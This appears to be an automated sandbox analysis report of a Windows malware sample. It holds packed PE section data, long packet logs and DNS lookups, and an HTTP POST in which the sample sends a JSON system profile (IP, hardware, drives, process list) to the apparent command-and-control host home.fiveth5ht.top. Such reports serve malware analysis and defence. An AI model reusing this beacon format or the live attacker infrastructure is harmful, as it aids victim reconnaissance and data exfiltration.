ywbalksd | 0xa81000 | 0x1bf000 | 0x1bee00 | 96a1bdac7952a595c6ebbbf0ab4a0aea | False | 0.994453125 | data | 7.955597758954747 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
codissdg | 0xc40000 | 0x1000 | 0x400 | 78e226e7654a9d4e0e27c8e9155c2eb0 | False | 0.734375 | data | 5.814335075900996 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0xc41000 | 0x3000 | 0x2200 | fddb362a1a8ca17692fb8c6ca38ffc21 | False | 0.06479779411764706 | DOS executable (COM) | 0.7506224252628687 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0xc3facc | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402
DLL | Import
kernel32.dll | lstrcpy
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                Dec 27, 2024 08:46:25.481493950 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.481534958 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.481544971 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:25.481581926 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:25.481735945 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.481746912 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.481795073 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:25.481878042 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.481888056 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.482002974 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.482114077 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.482207060 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.482217073 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.482337952 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.482357025 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.482480049 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.482539892 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.482812881 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.482822895 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.482947111 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.482964993 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.483048916 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.483082056 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.483233929 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.483269930 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.483427048 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.483455896 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.483577013 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.483587980 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.483696938 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.483738899 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.483874083 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.483887911 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.484056950 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.484069109 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.484211922 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.484303951 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.484380960 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.484426022 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.484565973 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.484576941 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.484711885 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.521014929 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.596301079 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.596322060 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.596533060 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.596599102 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.596987009 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.597143888 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.597558975 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:25.597665071 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:25.599045038 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.599101067 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.599111080 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.599170923 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.599230051 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.599368095 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.599488020 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.599497080 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.599505901 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.599587917 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.599642992 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.599714041 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.599737883 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.599817991 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.599837065 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.599927902 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.599946022 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.600061893 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.600123882 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.600250959 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.600321054 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.600374937 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.600491047 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.600632906 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.600642920 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.600713015 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.600729942 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.600840092 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.600889921 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.601031065 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.601041079 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.601147890 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.601157904 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.601325035 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.601335049 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.601401091 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.601421118 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.601547003 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.601648092 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.601735115 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.601779938 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.601855993 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.601870060 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.601950884 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.601962090 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.602034092 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.602088928 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.602125883 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.602193117 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.602276087 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.602294922 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.602426052 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.602469921 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.602482080 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.602787018 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:25.602859974 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:25.717276096 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.717293978 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.717386007 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.717417002 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.717485905 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.717534065 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.717613935 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.717662096 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.717770100 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.717802048 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.717864990 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.717914104 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.717987061 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.717997074 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.718069077 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.718122005 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.718194962 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.718247890 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.718334913 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.718353033 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.718435049 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.718498945 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.718596935 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.718606949 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.718722105 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.718734026 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.718842983 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.718853951 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.718882084 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.718940020 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.719043016 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.719053030 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.719124079 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.719168901 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.719218016 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.719270945 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.719322920 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.719369888 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.719444036 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.719461918 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.719542027 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.719561100 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.719671011 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.719690084 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.719783068 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.719794035 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.719876051 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.719893932 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.719999075 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.720010042 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.720098972 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.720108032 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.720215082 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.720225096 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.720529079 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:25.722397089 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.722486973 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.722507954 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.722593069 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.722603083 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.722639084 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.722722054 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.722810984 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.722830057 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.722946882 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.722965956 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.723057985 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.723076105 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.723210096 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.723227978 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.723356009 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.723408937 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.723587990 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.723607063 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.723728895 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.723747015 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.723835945 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.723875999 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.723918915 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.724035978 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.724047899 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.724081039 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.724157095 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.724168062 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.724260092 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.724296093 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.724360943 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.724395990 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.724489927 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.724499941 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.724579096 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.724590063 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.724708080 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.724716902 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.724781990 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.724801064 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.724868059 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.724963903 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.724973917 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.725007057 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.725075960 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.725090027 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.725193977 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.725204945 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.725291014 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.725301981 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.725385904 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.725418091 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.725511074 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.840315104 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.840331078 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.840513945 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.840526104 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.840651989 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.840697050 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.841011047 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.841022968 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.841197014 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.841207981 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.841340065 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.841389894 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.841507912 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.841640949 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.841742992 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.841753006 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.841850996 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.841968060 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.842185974 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.842195034 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.842284918 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.842308998 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.842408895 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.842427015 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.842535019 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.842607021 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.842722893 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.842732906 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.842778921 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.842843056 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.842926979 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.842947006 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.843067884 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.843132019 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:25.843142033 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:27.998560905 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:27.998584032 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:27.998680115 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:27.999133110 CET4971080192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:28.118603945 CET80497105.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:28.203485966 CET4972180192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:28.323080063 CET80497215.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:28.323223114 CET4972180192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:28.323616982 CET4972180192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:28.443041086 CET80497215.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:29.896974087 CET80497215.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:29.897094965 CET80497215.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:29.897149086 CET4972180192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:29.897572041 CET4972180192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:30.017033100 CET80497215.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:30.113591909 CET4972780192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:30.233124018 CET80497275.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:30.233340025 CET4972780192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:30.233782053 CET4972780192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:30.353225946 CET80497275.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:31.787430048 CET80497275.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:31.787621975 CET80497275.101.3.217192.168.2.6
                                Dec 27, 2024 08:46:31.787698984 CET4972780192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:31.788024902 CET4972780192.168.2.65.101.3.217
                                Dec 27, 2024 08:46:31.907466888 CET80497275.101.3.217192.168.2.6
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Dec 27, 2024 08:46:19.479916096 CET | 62313 | 53 | 192.168.2.6 | 1.1.1.1 |
| Dec 27, 2024 08:46:19.480072021 CET | 62313 | 53 | 192.168.2.6 | 1.1.1.1 |
| Dec 27, 2024 08:46:19.617466927 CET | 53 | 62313 | 1.1.1.1 | 192.168.2.6 |
| Dec 27, 2024 08:46:19.617517948 CET | 53 | 62313 | 1.1.1.1 | 192.168.2.6 |
| Dec 27, 2024 08:46:23.964118958 CET | 55229 | 53 | 192.168.2.6 | 1.1.1.1 |
| Dec 27, 2024 08:46:23.964215994 CET | 55229 | 53 | 192.168.2.6 | 1.1.1.1 |
| Dec 27, 2024 08:46:24.103250027 CET | 53 | 55229 | 1.1.1.1 | 192.168.2.6 |
| Dec 27, 2024 08:46:24.103276014 CET | 53 | 55229 | 1.1.1.1 | 192.168.2.6 |
| Dec 27, 2024 08:46:28.063817024 CET | 55231 | 53 | 192.168.2.6 | 1.1.1.1 |
| Dec 27, 2024 08:46:28.063894033 CET | 55231 | 53 | 192.168.2.6 | 1.1.1.1 |
| Dec 27, 2024 08:46:28.202284098 CET | 53 | 55231 | 1.1.1.1 | 192.168.2.6 |
| Dec 27, 2024 08:46:28.202306032 CET | 53 | 55231 | 1.1.1.1 | 192.168.2.6 |
| Dec 27, 2024 08:46:29.975699902 CET | 55233 | 53 | 192.168.2.6 | 1.1.1.1 |
| Dec 27, 2024 08:46:29.975769997 CET | 55233 | 53 | 192.168.2.6 | 1.1.1.1 |
| Dec 27, 2024 08:46:30.112359047 CET | 53 | 55233 | 1.1.1.1 | 192.168.2.6 |
| Dec 27, 2024 08:46:30.112391949 CET | 53 | 55233 | 1.1.1.1 | 192.168.2.6 |

| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Dec 27, 2024 08:46:19.479916096 CET | 192.168.2.6 | 1.1.1.1 | 0xf4fe | Standard query (0) | httpbin.org | A (IP address) | IN (0x0001) | false |
| Dec 27, 2024 08:46:19.480072021 CET | 192.168.2.6 | 1.1.1.1 | 0x274a | Standard query (0) | httpbin.org | 28 | IN (0x0001) | false |
| Dec 27, 2024 08:46:23.964118958 CET | 192.168.2.6 | 1.1.1.1 | 0xcfb0 | Standard query (0) | home.fiveth5ht.top | A (IP address) | IN (0x0001) | false |
| Dec 27, 2024 08:46:23.964215994 CET | 192.168.2.6 | 1.1.1.1 | 0x6ecd | Standard query (0) | home.fiveth5ht.top | 28 | IN (0x0001) | false |
| Dec 27, 2024 08:46:28.063817024 CET | 192.168.2.6 | 1.1.1.1 | 0xbbf6 | Standard query (0) | home.fiveth5ht.top | A (IP address) | IN (0x0001) | false |
| Dec 27, 2024 08:46:28.063894033 CET | 192.168.2.6 | 1.1.1.1 | 0x5a40 | Standard query (0) | home.fiveth5ht.top | 28 | IN (0x0001) | false |
| Dec 27, 2024 08:46:29.975699902 CET | 192.168.2.6 | 1.1.1.1 | 0x529c | Standard query (0) | home.fiveth5ht.top | A (IP address) | IN (0x0001) | false |
| Dec 27, 2024 08:46:29.975769997 CET | 192.168.2.6 | 1.1.1.1 | 0x241f | Standard query (0) | home.fiveth5ht.top | 28 | IN (0x0001) | false |

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Dec 27, 2024 08:46:19.617517948 CET | 1.1.1.1 | 192.168.2.6 | 0xf4fe | No error (0) | httpbin.org | | 3.218.7.103 | A (IP address) | IN (0x0001) | false |
| Dec 27, 2024 08:46:19.617517948 CET | 1.1.1.1 | 192.168.2.6 | 0xf4fe | No error (0) | httpbin.org | | 34.226.108.155 | A (IP address) | IN (0x0001) | false |
| Dec 27, 2024 08:46:24.103276014 CET | 1.1.1.1 | 192.168.2.6 | 0xcfb0 | No error (0) | home.fiveth5ht.top | | 5.101.3.217 | A (IP address) | IN (0x0001) | false |
| Dec 27, 2024 08:46:28.202284098 CET | 1.1.1.1 | 192.168.2.6 | 0xbbf6 | No error (0) | home.fiveth5ht.top | | 5.101.3.217 | A (IP address) | IN (0x0001) | false |
| Dec 27, 2024 08:46:30.112359047 CET | 1.1.1.1 | 192.168.2.6 | 0x529c | No error (0) | home.fiveth5ht.top | | 5.101.3.217 | A (IP address) | IN (0x0001) | false |

                                • httpbin.org
                                • home.fiveth5ht.top
                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                0 | 192.168.2.6 | 49710 | 5.101.3.217 | 80 | 6720 | C:\Users\user\Desktop\lolvgcpX19.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Dec 27, 2024 08:46:24.226077080 CET | 12360 | OUT | POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                Host: home.fiveth5ht.top
                                Accept: */*
                                Content-Type: application/json
                                Content-Length: 500650
                                Data Ascii: { "ip": "8.46.123.189", "current_time": "8452132140001155917", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 560 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 652 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "fontdrvhost.exe", "pid": 788 }, { "name": "svchost.exe", "pid": 868 }, { "name": "svchost.exe", "pid": 928 }, { "name": "dwm.exe", "pid": 996 }, { "name": "svchost.exe", "pid": 436 }, { "name": "svchost.exe", "pid": 376 }, { "name": "svchost.exe", "pid": 60 }, { "name": 